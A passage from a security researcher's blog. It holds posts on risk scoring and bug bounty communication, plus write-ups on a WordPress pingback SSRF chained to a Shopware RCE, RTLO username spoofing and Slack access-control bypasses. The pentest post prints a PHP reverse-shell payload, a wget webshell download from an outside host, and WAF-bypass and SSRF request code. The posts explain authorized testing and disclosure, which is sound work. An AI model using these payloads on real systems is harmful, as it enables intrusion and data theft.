How to evolve an alternative approach to risk assessment (Part I)

Dec, 13th 2020

INTRO

This text aims to present an alternative approach to risk assessment. Unfortunately, many companies treat risk management and information security as a mere compliance exercise - for example, because as a listed company they have to meet the relevant requirements.
A dedicated employee or a small team is then assigned to the topic and works on it in isolation. The other departments only come into contact with these colleagues once a year during the IT audit, are taken entirely by surprise, and experience an inevitable gap that they simply have to endure.
And how do you bring information security into line with today's fast-paced world of work - for example, in eCommerce, where every feature, no matter how small, is essential to keep pace with the industry leaders?
How can you avoid creating a bottleneck in an agile development environment if you want to subject every feature to a thorough security check before it goes live? Business first / feature first mentality? Business vs. information security?
But what if the management firmly believes that information security is an integral part of the relationship of trust with customers and business partners?

PRECONDITION

In this case, we consider a company with 2,000+ employees. The management takes information security and data protection seriously and attaches great importance to ensuring that ALL employees receive appropriate basic training.

Develop the value chain and protection requirements

It is important to work out with the management, in joint meetings and workshops, how the company earns money and what the value chain looks like. The next step is to break the value chain down into individual elements and identify the crown jewels. A classification of the protected objects is then required. Once this has been defined, it can be determined together with the management what protection requirements these objects have in terms of confidentiality, integrity and availability. From this, the security priority, the required trust boundaries and the priority with which a security incident is processed can be derived.

NECESSARY TRAINING AND AWARENESS

Security concerns us all. It is important to sensitize every employee to the topic and to explain that each employee is part of the overall information security concept and that we can only be successful if we work together. All employees are important and must be valued - this also includes mandatory basic training in information security, regardless of whether they work in the IT department, in purchasing, in marketing or as a craftsperson or caretaker.

IMPORTANT MILESTONE

As soon as a relationship of trust and openness to information security has been established in the organization, employees will approach the members of the security team on their own and ask questions or point out phishing and scam campaigns. It is important to thank these employees for their awareness and to make clear that their vigilance is essential for customers, partners, and fellow employees. That is an important milestone.

Next step - decentralized data protection and security management process

What does the company structure and organization chart look like? Are there project managers or product managers? Suppose this is the case and they are responsible for product development and the implementation of business goals. In that case, it can be worked out with them in dedicated workshops that they are also data owners and are therefore responsible for data protection. Once everyone shares this common understanding, we can integrate them into a decentralized data protection and security management group. At the latest at this point, something changes: the IT audit function or the security team no longer has to proactively approach the team or product owner to carry out a security audit. Instead, the product owner recognizes the added value and proactively requests security audits and has them carried out.

WHICH SCORING SYSTEM FITS BEST?

From the point of view of vulnerability management, we know established scoring methods and systems such as "CVSS", "D.R.E.A.D.", "S.T.R.I.D.E." and more. However, these are often very technical, and one has the feeling that too much subjectivity influences the result. For example, a web security expert will presumably rate attack vectors such as "CSRF", "XSS", and "local file exposure" more critically than a dyed-in-the-wool system administrator, who will probably immediately associate the term vulnerability with "remote code execution" or "SQL injection" and rate those as anything but low per se. So if even the technicians disagree, how are non-technical product owners in particular supposed to understand the assessment?

INTRODUCING AN OWN RISK SCORING SYSTEM

First of all, it is essential to note that this proposal introduces a risk management process that is accepted and understood by the workforce, and that the responsible owners have received a workshop and a brief introduction on how to interpret the questions and why they matter. The aim should be to ask a maximum of ten objective questions that show the person responsible at a glance whether they must remedy the risk immediately or whether they can consciously accept it for a period of a few weeks in favor of the business priorities.

QUESTIONS TO BE ASKED for a proper RISK evaluation

The following questions do not fit every context or every company; they represent an example that has worked well for me. They serve only as a suggestion and should by no means be adopted one-to-one. They can be implemented in a web form so that the questions are static and the answers can be chosen from a drop-down menu or, if necessary, from a multi-select field.

Is sensitive information at Risk?
YES: PII
YES: trade secrets
YES: intellectual property (e.g. source code)
NO

CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?
confidentiality
integrity
availability

Is user-interaction (victim) needed for a successful exploitation?
YES
NO

Is the Risk publicly known?
YES: MITRE, CVE, BLOG, Social Media
YES: external Researcher reported to us
YES: Customer or Partner reported to us
NO

Could we verify the finding with our five commonly used security tools?
YES
NO

Are there log files that we can investigate?
YES
NO

Are detective measures in place?
YES: monitoring
YES: email alerting
NO

Can we immediately apply a quick-win remediation until it is properly fixed?
YES (e.g. CAPTCHA, throttling, isolation, firewalling)
NO

RISK SCORE EVALUATION

Based on these eight questions we can set up a proper risk score evaluation, assign numeric values to the answers, and add them up. In my case, the score leads to the conclusion that the Risk is either "severe" and therefore has to be handled urgently (i.e., within three days), or the Risk is mediocre and should be taken care of within the next 90 days. In my next blog post (part II) I will guide you through three real-life examples and share the scripts which allow you to automatically get a proper Risk evaluation based on these criteria.
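
To make the idea more concrete, here is a minimal Python sketch of such a scoring helper. The question keys, weights and the "severe" threshold are illustrative assumptions only, not the values I actually use:

# Minimal sketch of a risk scoring helper. The keys mirror the questions above;
# weights and thresholds are illustrative assumptions.
QUESTION_WEIGHTS = {
    "sensitive_information_at_risk": 3,        # PII, trade secrets, IP
    "harms_confidentiality_or_integrity": 2,
    "no_user_interaction_needed": 2,
    "publicly_known": 2,
    "verified_with_our_tools": 1,
    "no_log_files_available": 1,
    "no_detective_measures": 1,
    "no_quick_win_remediation": 1,
}

def risk_score(answers: dict) -> str:
    """answers maps each question key to True/False."""
    score = sum(weight for key, weight in QUESTION_WEIGHTS.items() if answers.get(key))
    # Illustrative threshold: everything above 7 is treated as "severe".
    return "severe (fix within 3 days)" if score > 7 else "mediocre (fix within 90 days)"

if __name__ == "__main__":
    example = {
        "sensitive_information_at_risk": True,
        "harms_confidentiality_or_integrity": True,
        "no_user_interaction_needed": True,
        "publicly_known": True,
    }
    print(risk_score(example))  # -> severe (fix within 3 days)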

Stay tuned!
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

communication in bug bounty programs (as triager, researcher, manager)

Dec, 12th 2020

INTRO

After an exciting exchange with some people on this topic, I decided to explain my perspective and point of view because, since 2009, I have been able to learn and work on the different sides of the security bug bounty world. During this period, I gained experience as a Researcher/Pentester on one side and as a program manager for three companies that operate their own private bug bounty programs on the other.

WE ARE HUMANS WITH EXPRESSIONS, and EMOTIONS

I had many exciting and lively exchanges on both sides of the coin, but I don't want to deny a high level of frustration on both sides.

After a few years of dealing with bug bounties, I realized that one can only achieve the right balance with appropriate interpersonal communication training and by learning how to communicate gently and with genuine compassion on a human level.

It is essential to always remain polite and approach the other person with respect and understanding - this is especially true for written text, as you cannot read the other person's emotions from their face and facial expressions.

REAL LIFE EXAMPLES AS A TRIAGER

In the following section, I would like to show you examples from my own experience that were (a bit) frustrating, how they ultimately turned out and what was needed to defuse the situation as early as possible in human-to-human communication.

IMPORTANT:
1. Everything written here is my personal view and does not represent my employer! :)

2. Thank you to the affected Researchers for permitting me to cite text from their messages/emails/reports so that we can look at these situations and learn from them.


CASE 1: AS A TRIAGER
As a "triager" I regularly received reports from Researcher, Pentester, ethical Hacker, Hobbyists and Bug Hunter, which had much potential for improvement. To make things easier in this text I will use the term "Researcher" instead of picking one of the other titles. Since basically anyone can participate in most bug bounty programs without a certificate of education: grammar and spelling are often severely neglected, which is a fact to be accepted.
If the Researcher doesn't understand or poorly understands the attack vector, he/she is about to report; things get tricky.


TRIAGE EXAMPLE 1:
I received a report regarding a potential CSRF issue. The Researcher wrote the following description:

"CSRF enables the attacker to gain remote access to the admin's desktop and all the files he has stored there."

At this point, I could have rated the ticket as "N/A" or "incomplete" because of this description. But that's not what I want. It is my responsibility to ensure that we can either verify the potential risk or refute its existence. It is always important to me to pursue this and to contribute constructively to the solution. It is also essential to invest the time with colleagues to determine when we introduced the vulnerability and whether a malicious actor exploited it in the last 14 days (or for however long you can keep log files in the respective context).

Personally, I feel I have an educational mandate to fulfill.
After verifying the presence of the CSRF vulnerability, I replied to the Researcher.
I told him/her that this attack scenario was exceptional and did not apply to our web application.
Instead, I explained to him/her an attack scenario that does apply to us - with the goal and hope that the researcher will have a better understanding the next time he/she reports a CSRF to us.


TRIAGE EXAMPLE 2:
A Researcher reported a race condition which occurred under certain rare circumstances and would lock the database access, raise an error and leak internal credentials. The Researcher wrote in imperfect English:

"Hi Sirs and Madams, you have code execution in database I get sugar secrets..."

Again, I could reply with "N/A" or "can't reproduce" and move on.
Instead, I read his/her text three times and still had a hard time understanding it due to the language barrier, so I looked at the screenshots and the Python script he/she sent us.
After reading the source code, I had a clue what he/she was trying to achieve, but it did not immediately work as a reliable proof of concept. So I took the time to investigate, reviewed the source code to ensure that it did not contain any backdoor or malicious code, and afterwards ran the script in multiple threads against all of our database (and replica) servers.

After a while, I could reproduce the issue and finally got the expected results.
It turned out that this was a race condition and only applied to one specific database replica server because it had a different configuration, which had been changed manually in one case for debugging purposes.
The person in charge forgot to undo the changes after the debugging session.
We could immediately fix the issue.

Once solved, I wrote to the Researcher, told him/her the steps needed to reproduce it, and gave him/her a template which he/she can use for such issues in the future.

REAL LIFE EXAMPLES AS A RESEARCHER

As a researcher, I've reported many issues and potential risks to several companies. Sometimes there was criticism or a misunderstanding due to different skill sets or the language barrier, but in the end it was an enjoyable experience and communication. In conclusion, I've had more positive than negative experiences with (private) bug bounty programs.


RESEARCHER EXAMPLE 1:

I remember a case very well where I've received a low bounty due to my initial proof of concept. Three weeks later, the company increased the bounty to the highest amount because their internal security team found other systems affected by the same issue and root cause.


RESEARCHER EXAMPLE 2:

By accident, I identified a template injection which led to RCE on a well-known web site. You wonder how? I visited the website as a customer, and the rendered HTML showed me some errors. My curiosity made me look for the frameworks in use. I then downloaded these frameworks and started my research, which finally led to the RCEs I identified and which became known as CVE-2016-4977. When I contacted the company and sent them a report with my research, they told me they ran a private bug bounty program and asked me to register for it. I did so, and after a few days, I received a bounty for these findings. That was pretty generous of them. They could have taken the report for free, or invited me to the program but told me that I would not receive a reward because I sent them the report before being part of the program. I am very thankful for how they handled this.


RESEARCHER EXAMPLE 3:

It has happened to me three times that I reported an issue, which was triaged and verified quickly, but then months passed without a reply. Finally, I received the message that the program had ended because it was no longer active, which meant that I did not receive any reward. Of course, I was very frustrated and tried to involve a mediator who, in all three cases, told me that there is nothing he/she can do once the company quits the bug bounty program. Finally, I had to accept it and move on.

Are there any lessons learned for me?
Yes, sure. I learned that I have to ask for an update before the six-month period ends, for example after three months, and if they don't reply, to kindly ask once again after four months.
At that point I tell the company that if they don't respond after five months, I will request mediation on the bug bounty platform and hope for polite treatment.

GENERAL THOUGHTS, TIPS

My recommendations to researchers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Be polite and invest the time to describe an attack scenario that applies to the actual web site/service you have performed the penetration test against.

2. Whenever possible, include a video as proof of concept, especially if chances are high that you will run into language barriers.

3. It is nice to know and to be able to reference "ASVS", "CVSS", "CWE", "D.R.E.A.D.", "STRIDE", and similar scoring methods, best practices or standards - but in my experience, it is often more important to the affected company to have the following questions answered as early as possible in your report:

3.1. Is PII (especially "GDPR" article 9 data) at Risk?

3.2. CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?

3.3. Is user-interaction (victim) needed for a successful exploitation?

3.4. Is authentication needed for successful exploitation?

My recommendations to Triagers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Please be polite, keep calm and believe in the good in people.
If you think the Researcher is rude: maybe it's only due to the language barrier or a lack of skill.

2. Keep in mind that (sensitive) information (e.g. PII) may be at Risk.
If the Researcher chose the wrong CVSS rating, maybe the attack vector simply does not map well to CVSS. Please don't let this be the only reason not to investigate the issue properly. Instead, correct the CVSS and give the issue the importance it needs!

3. If you don't understand the issue or its impact, please take the time to ask the Researcher your questions.

4. If you come to the conclusion that it is "n/a" or "can't reproduce", please take the time to explain this to the Researcher and, if possible, give them a hint about what they can do better next time.

5. As the triager, you have to know which kind of information is at Risk on the vulnerable system. If you don't know, feel free to ask the responsible owner. The Researcher will often not have internal information such as a full list of protection-worthy data, flow diagrams, database schemas, threat models and abuse-potential analyses - so forcing them to guess which kind of information "could" be at Risk is a waste of time and will most likely frustrate the Researcher and you as the triager.

My questions to a company that wants to join a (public) security bug bounty program:

1. Are you aware that running a security bug bounty program is very time-consuming?
Most likely, you should plan for a full-time employee for this!

2. Do you have employees that have the skills needed to verify the (technical) security issues?

3. Do you have a program manager who is trained in interpersonal communication and rhetoric and who can keep calm? Someone who acts as a mediator if the Researcher is rude or frustrated, to ensure that the situation does not quickly escalate on a personal level?

4. As the responsible owner and person in charge, you have to know which kind of information is at Risk on the vulnerable system. If you don't know, how can you expect the Researcher to know?

5. Please consider sharing information such as a list of protection-worthy data, flow diagrams, threat models or abuse-potential analyses with the Researchers (under NDA and with permission to attack).

6. Are you able to offer a staging system so that Researchers do not have to penetrate your production systems?
If not, please be aware that your production systems may get harmed.

7. If you want to share the security report with your colleagues in a ticketing system like JIRA, consider sharing a template with the Researcher, so that the researcher can supply you with a formatted report. :)

My question to the owner of public bug bounty platforms:

1. Do you treat the companies and the researchers on your platform alike?

2. Do you have trained personnel to mediate and help whenever the communication between the "triager" and the researcher escalates?

3. Do you force researchers to describe, e.g., OWASP Top 10 risks over and over again instead of offering them a well-written description for common weaknesses?

Please keep in mind that, as a platform, you can take the burden off the shoulders of researchers and triagers if you offer them the opportunity to select the description from a drop-down menu instead of letting them describe, and potentially misrepresent, these issues.

4. Do you encourage the employees of the companies that want to join your program to learn the basics of (web) security issues before they have their own "triagers" participating in the program?

5. Are you willing to remove a triager or researcher from the program who misbehaves in the communication at any time?

6. Whenever possible: do you offer target scope definitions as configuration files for the most common security tools?

THANKS FOR YOUR ATTENTION

Okay, that's it.
I hope you can take something away from my blog post or rethink your opinion about the other side of the coin. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

FROM ZERO INFO TO ZERO-DAY :)

June, 30th 2020

INTRO

In this blog post I will write about my thinking process during the respective security audit and share my failed attempts with you as well. I hope that we can inspire and motivate each other in the community to stay tuned and learn from ideas that were not successful in this particular case but can lead to success in other (corner) cases in the future.

TL;DR:

We will perform information gathering, bypass a filter, abuse an SSRF, discover a zero-day RCE during the research and finally exfiltrate sensitive information.

PREPARING THE PENTEST AND SCOPE

Back in 2016, I performed a penetration test for which I received minimal information upfront. The goal was to infiltrate the target and access their internal systems or to exfiltrate (sensitive) internal information.

The scope was *.targetcompany.com!

INFORMATION GATHERING

During the information-gathering phase, I crawled the web site and extracted the frameworks revealed in the HTML source or HTTP response headers. Once this step was finished, I manually reviewed the structures and started to look for version disclosures.

I quickly discovered that the company's blog was running WordPress. So one obvious step for me was to check whether I could access any admin interfaces or files without logging in.
That was not the case here, so next I checked the rendered HTML source and found a reference to the "xmlrpc.php" file.

When I tried to access the file, the server returned a "404 not found" error message. Since the file was referenced in the HTML code, I assumed that they were probably using a WAF and had "xmlrpc.php" on a blocked-list for any access from an IP address that is not part of their company network.

FILTER BYPASS

So quite naturally, I attempted to bypass the blocked-list by using the following encoding combinations:

1. add a slash to the URL like this: "https://blog.targetcompany.com//XMLRPC.php"
2. urlencode the slash once: "https://blog.targetcompany.com/%2fXMLRPC.php"
3. urlencode the slash twice: "https://blog.targetcompany.com/%252fXMLRPC.php"
4. urlencode the slash once and urlencode one other character:
"https://blog.targetcompany.com/%2fXMLRPC.ph%70"
5. urlencode the slash and one other character twice:
"https://blog.targetcompany.com/%252fXMLRPC.ph%2570"

Success!
The successful attempt used double URL encoding: the WAF/application was decoding the user-submitted input only once before performing the string comparison against the strings on the blocked-list.

So the fifth payload, with double URL encoding, bypassed their filter, and I could now access the "XMLRPC" controller from an external IP address.
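
To illustrate why the double-encoded payload slips past a filter that decodes only once, here is a small Python sketch (the blocked string and the decode-once behaviour are assumptions about how such a WAF typically works):

from urllib.parse import unquote

blocked = "xmlrpc.php"
payload = "%252fXMLRPC.ph%2570"   # double URL-encoded "/XMLRPC.php"

# A filter that decodes only once still sees percent-encoded characters ...
decoded_once = unquote(payload)
print(decoded_once)                        # %2fXMLRPC.ph%70
print(blocked in decoded_once.lower())     # False -> request passes the filter

# ... while the application decodes a second time and resolves the real file.
decoded_twice = unquote(decoded_once)
print(decoded_twice)                       # /XMLRPC.php
print(blocked in decoded_twice.lower())    # True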

The next step was to check, by exploiting the now accessible endpoint, whether it is possible to perform out-of-band HTTP requests.
I looked at whether an older version of the "XMLRPC" controller was in place so that I could use the "pingback.ping" method to make outbound requests to my external server and expose internal IP addresses or other routes that, for example, are not behind a DDoS protection like the one Cloudflare or Akamai offers.

To verify whether the "pingback.ping" method is available, I posted a request to list the available methods.
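
The request looked roughly like the following Python sketch (using the double-encoded path from above; whether your HTTP client preserves the raw percent-encoding should be double-checked):

import requests

# Hedged sketch (not the literal request): call system.listMethods via the
# double-encoded path that slipped past the blocked-list.
url = "https://blog.targetcompany.com/%252fXMLRPC.ph%2570"
body = """<?xml version="1.0"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>"""

resp = requests.post(url, data=body, headers={"Content-Type": "text/xml"})
print(resp.text)  # the returned method list should contain pingback.ping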



The "pingback.ping" method is available on the target system. Nice!

The next step is to check if we can make out-of-band HTTP requests so that we can potentially abuse this like a Server-side Request Forgery (SSRF) later and use it to gain access to internal hosts and (sensitive) internal information.
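
Conceptually, the out-of-band check looks like this sketch: pingback.ping(pagelinkedfrom, pagelinkedto) makes WordPress fetch the "pagelinkedfrom" URL, so pointing it at a host I control proves that outbound requests are possible (hostnames below are placeholders):

import requests

# Hedged sketch of the SSRF probe via pingback.ping.
url = "https://blog.targetcompany.com/%252fXMLRPC.ph%2570"
body = """<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>https://attacker-controlled.example/callback</string></value></param>
    <param><value><string>https://blog.targetcompany.com/some-blog-post/</string></value></param>
  </params>
</methodCall>"""

print(requests.post(url, data=body, headers={"Content-Type": "text/xml"}).text)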



The HTTP request was successful; however, I had not yet gained access to any potentially sensitive information. At this point, I could have started to enumerate or brute-force internal server names.

I decided to check for internal hostnames by using "crt.sh" or a similar service, which would help me quickly identify subdomains or internal-only hosts whose hostnames leak through public SSL certificates.

I found a few generic-sounding subdomains like "portal.int.targetcompany.com", "backend-cms.int.targetcompany.com" and "checkout.portal.int.targetcompany.com", but I did not know what software was running there. One that caught my attention was:
http://shopware.int.targetcompany.com

Next, I spent my time looking for publicly available exploits for Shopware that would allow me to obtain code execution. However, no exploits were found, so I decided to dig deeper and hunt for zerodays in Shopware myself.

ZERODAY RESEARCH

I decided to download the source code of Shopware and hunt for zeroday vulnerabilities. After a couple of hours of research, I identified a remote code execution in the "/backend/Login/load" module. After investigating the root cause and identifying the sinks, I wrote a proof-of-concept exploit for it and verified it on my local Shopware installation so that I could add this exploit to my exploit chain in this pentest.

ATTACK SCENARIO

Now my attack scenario looked like this:
1. Bypass the filter to access restricted methods such as "pingback.ping" in "xmlrpc.php"
2. Use the "pingback.ping" method to make an HTTP GET request to the internal Shopware host
3. With the RCE exploit, finally spawn a reverse shell on the target system or exfiltrate internal information

(INCOMPLETE) TRUST BOUNDARIES


This is an incomplete threat model sketching the trust boundaries I had in mind.

EXPLOITATION

The final chained exploit code looked like the next screenshot.
To make it easier to read, I've included it as plaintext in the picture. Hint: the original request was URL-encoded before being sent.
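
Conceptually, the chain looked like this Python sketch; the internal host comes from the crt.sh research above, and the Shopware payload is a placeholder, not the real exploit:

import requests

# Hedged sketch of the chained request: the filter-bypassing xmlrpc endpoint
# is abused via pingback.ping to make the blog server request the internal
# Shopware backend with the (placeholder) RCE payload.
xmlrpc = "https://blog.targetcompany.com/%252fXMLRPC.ph%2570"
internal = "http://shopware.int.targetcompany.com/backend/Login/load?payload=HYPOTHETICAL_RCE_PAYLOAD"

body = f"""<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>{internal}</string></value></param>
    <param><value><string>https://blog.targetcompany.com/some-blog-post/</string></value></param>
  </params>
</methodCall>"""

print(requests.post(xmlrpc, data=body, headers={"Content-Type": "text/xml"}).text)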



At this point we could also have tried to spawn a reverse-shell like this:
${{`php -r '$sock=fsockopen("secalert.net",23232);exec("/bin/sh -i <&3 >&3 2>&3");'`}}
or place a web shell on the target system like this:
wget http://secalert.net/exploits/reverse-shells/webshell.php;chmod +x webshell.php
and from that point on use the web shell instead of the issue in Shopware.

FINAL THOUGHTS

I had lots of fun while performing this pentest. I was thrilled to find any exploitable issue in Shopware because I was highly motivated to gain access to internal systems and data.
My research of the Shopware source code led to CVE-2016-3109.

After the pentest, the target company told me that they were evaluating Shopware on this internal system and had not yet put effort into protecting it.

Fortunately, there are many talented people in the infosec community today who share their findings with us and blog about them or post them on Twitter. Thanks for that.
You are awesome!

Unfortunately, these posts are sometimes short, focus on the final exploit code and show only the happy path, without giving deeper insights into the researcher's mindset. In my opinion, these thoughts are worth their weight in gold and are incredibly inspiring.

Hopefully, this article gave you some insights and motivates you to stay focused and not give up if you cannot quickly find severe issues in your target scope.

THANKS

I want to thank the Shopware Team for a very friendly and professional communication when I contacted them and supplied the proof of concept for what later became CVE-2016-3109.

Also I want to thank the following individuals for proof-reading this blog post:
@cschneider4711
@garethheyes
@irsdl
@janmuenther
@rafaybaloch
@RobinVerton
@payloadartist

REFERENCES

There are a few nice articles about other research on the "xmlrpc" controller:

1. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-alert-wordpress-xml-rpc-brute-force-scanning/

2. https://www.acunetix.com/blog/articles/wordpress-pingback-vulnerability/

3. https://blogs.akamai.com/2014/03/anatomy-of-wordpress-xml-rpc-pingback-attacks.html

4. If you know other cool articles, drop me a message and I will add the references :)

from RTLO to alleged admin

JUL, 4th 2020

INTRO

In this blog post, I want to share a little issue I had first discovered back in 2018 that can be used as part of your Security Awareness campaigns.

TL;DR:

I couldn't register as "admin" or "administrator", so I registered as another user and afterward changed my username using Unicode, because I wanted to trick the web application into showing it as "administrator" and thus facilitate phishing attacks.

PRECONDITION

Frequently, the registration controller is disabled. I would still recommend checking whether it is enabled and accessible when hunting for issues.

REGISTRATION

The target web site allowed a customer to register and post comments in WordPress located at:
https://blog.targetcompany.com/wp-login.php?action=register .

I tried to register with familiar names like "admin" or "administrator", which was not allowed. So I tried registering with Unicode look-alike characters that would look pretty much the same as "admin" but are still a different name. That did not work either.

So I registered as "administrators" with a trailing "s". I received an email for the double opt-in and verified the registration by visiting the link:
https://blog.targetcompany.com/wp-login.php?action=rp&key=bqbhs8qJydZH4IT7SZ90&login=administrators

side finding:
It is worth mentioning that it is a problem that my username in the "login" param is exposed in cleartext to 3rd-party web sites via the HTTP Referer header, which in itself could already be a GDPR issue.

REGISTERED! WHAT NOW?

I successfully registered as "administrators", but there was not much I could do with it because I was still a normal user. So I wondered whether the username-change process works the same way as the registration process.


I tried to rename my username from "administrators" to "admin". WordPress did not allow me to change to this username.

UNICODE FTW?

Next, I thought about RTLO (right-to-left override), which is U+202E in Unicode.

So I tried to rename it to:
%E2%80%AErotartsinimda

which consists of %E2%80%AE, the URL-encoded form of the RTLO sequence, followed by rotartsinimda, the reversed string of "administrator".
This was accepted.
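
For reference, this is how the new username can be built in a short Python sketch:

# Sketch: building the new username with a leading RTLO (U+202E) override.
RTLO = "\u202e"
new_username = RTLO + "administrator"[::-1]   # RTLO + "rotartsinimda"

print(new_username.encode("utf-8"))
# b'\xe2\x80\xaerotartsinimda'  -> URL-encoded as %E2%80%AErotartsinimda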

Next, I navigated to the comment section to verify whether the RTLO had worked or whether the web application would show my username as rotartsinimda.


The RTLO sequence worked: in the web browser it was successfully parsed, and my username was shown as "administrator".
This fact facilitates phishing attacks, because an average user would trust a comment posted by an administrator such as "Your session has expired. Please click here to re-login" with a link pointing to an attacker-controlled domain like https://blog.targeetcompany.com/ or similar.

FINAL THOUGHTS

In fact, this is a low-risk issue, but in my opinion it can be used as an "eye-catcher" in your Security Awareness campaign.

THANKS

I want to thank the private bug bounty programs for the bounties and thus for the opportunity to donate them to people in need who well deserve our help.

REFERENCES

https://www.fileformat.info/info/unicode/char/202e/index.htm

Slack, a brief journey to mission control

Oct, 20th 2016

Intro

In this blog post, I will describe my thoughts while hunting for security issues as part of Slack's bug bounty program which resulted in the findings of https://hackerone.com/reports/129918 and https://hackerone.com/reports/130133

Thanks to the Slack security team

I want to thank Leigh Honeywell and Max Feldman of the Slack security team for the gentle, professional communication and coordination in the bug reporting process.

Information gathering

To understand the infrastructure and gain information about the frameworks in use, I started by checking the HTTP response headers. I saw that Slack is using an Apache httpd server, so I tried to identify common Apache directories and directives like /icons/README, /manual/, /server-info and /server-status.

May I access your internal data, please?

Slack runs mod_status on the web server. The status module allows a server administrator to find out how well the server is performing and which resources have been requested from which IP addresses. An attacker may use this information to craft an attack against the web server.

https://secalert-hackerone.slack.com/server-status

When I tried to access the server-status page, the server redirected me to a login page located on the *.tinyspeck.com domain. So this path was protected.

Out of scope domain! Now what?

If you are lazy, be warned that brute force is not permitted by the rules of Slack's bug bounty program. One would now try to bypass the login page with some injection techniques, but unfortunately, the login page itself is located on an FQDN outside of the allowed scope, so this was not an option. I had to find a way to stay within the allowed scope of secalert-hackerone.slack.com.

Routing? Filter? - Blind testing

First of all, I thought that if they are using Apache httpd and mod_status, the redirect could be triggered by the rewrite module. The mod_rewrite module is a powerful module for Apache used for rewriting URLs on the fly. However, with such power come associated risks: it is easy to make mistakes when configuring mod_rewrite, which can turn into security issues. Take, for example, one of the configurations from the mod_rewrite documentation:

RewriteRule ^/somepath(.*) /otherpath$1 [R]
If this is the case, they could have misconfigured the RewriteRule, and therefore I could bypass it by simply adding a slash. Why? Requesting
http://yourserver/somepath/secalert
will redirect and return the page http://yourserver/otherpath/secalert as expected. However, requesting
http://yourserver//somepath/secalert
will bypass this particular RewriteRule. In the case of Slack it was not possible to bypass it this way, so I had to think outside the box.

I played around with representations of a slash in order to bypass a potentially simple string-based filter protection:
https://secalert-hackerone.slack.com/%2fserver-status%2f
https://secalert-hackerone.slack.com/%252fserver-status
I also played around with the RTLO sequence in order to bypass the filter by submitting the RTLO sequence followed by the reversed string:
https://secalert-hackerone.slack.com/{u+202e here}sutats-revres
https://secalert-hackerone.slack.com/%e2%80%aesutats-revres
None of these attempts worked.

Access control bypass!

After a few tests I thought that they might use a route map in their framework and that I could potentially bypass the routing mechanism or access control by adding multiple forward slashes - in case the applied filter checks whether the string starts with a particular prefix and strips a single forward slash, but misses stripping all slashes recursively. This finally worked.

https://secalert-hackerone.slack.com/////server-status
Success!
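
My guess about the broken check can be illustrated with a tiny Python sketch; this is an assumption about the logic, not Slack's actual code:

# Hypothetical sketch of an access-control check that strips only ONE leading
# slash before comparing against protected prefixes.
PROTECTED = ("server-status", "server-info")

def is_protected(path: str) -> bool:
    normalized = path[1:] if path.startswith("/") else path   # strips a single slash only
    return normalized.split("/")[0] in PROTECTED

print(is_protected("/server-status"))       # True  -> redirect to the login page
print(is_protected("/////server-status"))   # False -> check bypassed, httpd still resolves the path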

Bounty as low as $50?

While writing the report for Slack on HackerOne, I decided to add some screenshots as proof of concept. At this point I thought that I would earn the minimum bounty of $50 for reporting this misconfiguration issue, because the server-status page usually would not expose any sensitive information to me if the requested resources were part of my own Slack workspace, right? Well, I logged out of my Slack account and requested the server status without being logged in! That means that an attacker would potentially gain unauthorized access to the requested resources of ANY Slack site by accessing the server-status page of a given workspace!

Secrets exposed, increased bounty!

I realised that some requests were listed, like /callbacks/chat.php?secret=... and /users.list?token=..., which definitely contain sensitive data. So I added some screenshots, which most probably increased the bounty I finally received. Thanks again to Slack for that generous bounty.

Google indexing

After receiving the first bounty from Slack, which was generous, I was motivated to hunt for further issues. I googled for common file extensions on the Slack web sites and found cached URLs indicating that Slack has, or had, a back-end admin panel which Google had indexed in the past. When I tried to access these pages, I got redirected to the login page once again. But since Slack had resolved the previously reported issue, chances were low, right?

Backend access -> second bounty!

Slack employees have access to a backend admin panel called mission control. In the mission control panel, authorized people can read lots of metadata related to Slack users and Slack workspaces by passing an id to the corresponding controller. Since the needed "id" is exposed in the rendered HTML of my Slack workspace, I read the metadata associated with my own account and sent these screenshots to the Slack security team. Besides that, it turned out that an attacker would be able to reset the password of any user by guessing their "id" and passing a request to the associated reset controller in the mission control panel. This would allow an attacker to take over any account! For this issue, I received an additional bounty.

Outro

Be patient! Sometimes you may identify a flaw that seems trivial from a technical point of view but has a high business impact or raises a serious data privacy issue for the affected company, so they may rate the risk differently than you initially thought.

Apr, 11th 2016: issue identified and reported
Apr, 11th 2016: verified by slack
Apr, 13th 2016: issue fixed
Apr, 13th 2016: received a bounty of $2000 for https://hackerone.com/reports/129918
Apr, 14th 2016: identified and reported second issue
Apr, 14th 2016: issue verified by slack
Apr, 24th 2016: issue has been globally fixed
Apr, 24th 2016: additional bounty of $7000 for https://hackerone.com/reports/130133
Oct, 20th 2016: this write-up has been published

CVE-2016-4977: RCE in Spring Security OAuth 1&2

Oct, 13th 2016

Affected version

  • Pivotal Spring Security OAuth 2.0 - 2.0.9
  • Pivotal Spring Security OAuth 1.0 - 1.0.5

Background

A couple of months ago, I performed a security audit of a web application that used the Spring Security OAuth framework for authorization. During my research, I identified some issues, including remote code execution flaws. The web application implemented the Spring Security OAuth framework, which by default ships with a template prone to RCE! One would believe that it is secure by default, but indeed it was not. During my research, I realized that a couple of well-known websites also implemented the vulnerable code.

Spring Boot Demo

If you want to verify the issue yourself, you can download the spring boot demo application as a maven project from http://secalert.net/research/cve-2016-4977.zip.

Let's get started

Usually one would run the demo application by passing a legit request like:

http://localhost:8080/oauth/authorize?
response_type=token&client_id=secalert&scope=openid&redirect_uri=http://localhost
Everything works as intended. I then started to look for common issues like XSS:
http://localhost:8080/authorize?response_type=token&client_id=secalert&scope=openid
&redirect_uri=<s>XSS</s>

This led to an error which showed the Whitelabel Error Page. Surprisingly, there are lots of well-known websites which still use the Whitelabel Error Page instead of configuring a custom error page. The Spring Security OAuth example shows the Whitelabel Error Page by default whenever an error occurs. The Whitelabel view reflects parts of the given parameter values, which at first glance looks like XSS. After finding the XSS during blackbox testing, I reviewed the source code to identify the vulnerable code before reporting the issue upstream. While reviewing the source code, I realised that there is a more dangerous issue there.

Error handling calls "SpelView" endpoint

Let's review the source code of ErrorMvcAutoConfiguration.java.

